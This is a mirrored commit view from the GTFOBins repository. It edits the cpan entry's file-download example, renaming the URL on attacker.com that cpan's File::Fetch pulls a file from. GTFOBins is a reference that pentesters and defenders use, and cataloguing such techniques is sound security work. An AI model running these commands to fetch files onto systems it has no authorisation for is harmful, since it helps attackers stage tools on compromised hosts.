mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Polish cpan
This commit is contained in:
parent
754e5e0f95
commit
27c1c56577
@ -23,7 +23,7 @@ functions:
|
||||
file-download:
|
||||
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
||||
code: |
|
||||
export URL=http://attacker.com/evil.txt
|
||||
export URL=http://attacker.com/file_to_get
|
||||
cpan
|
||||
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user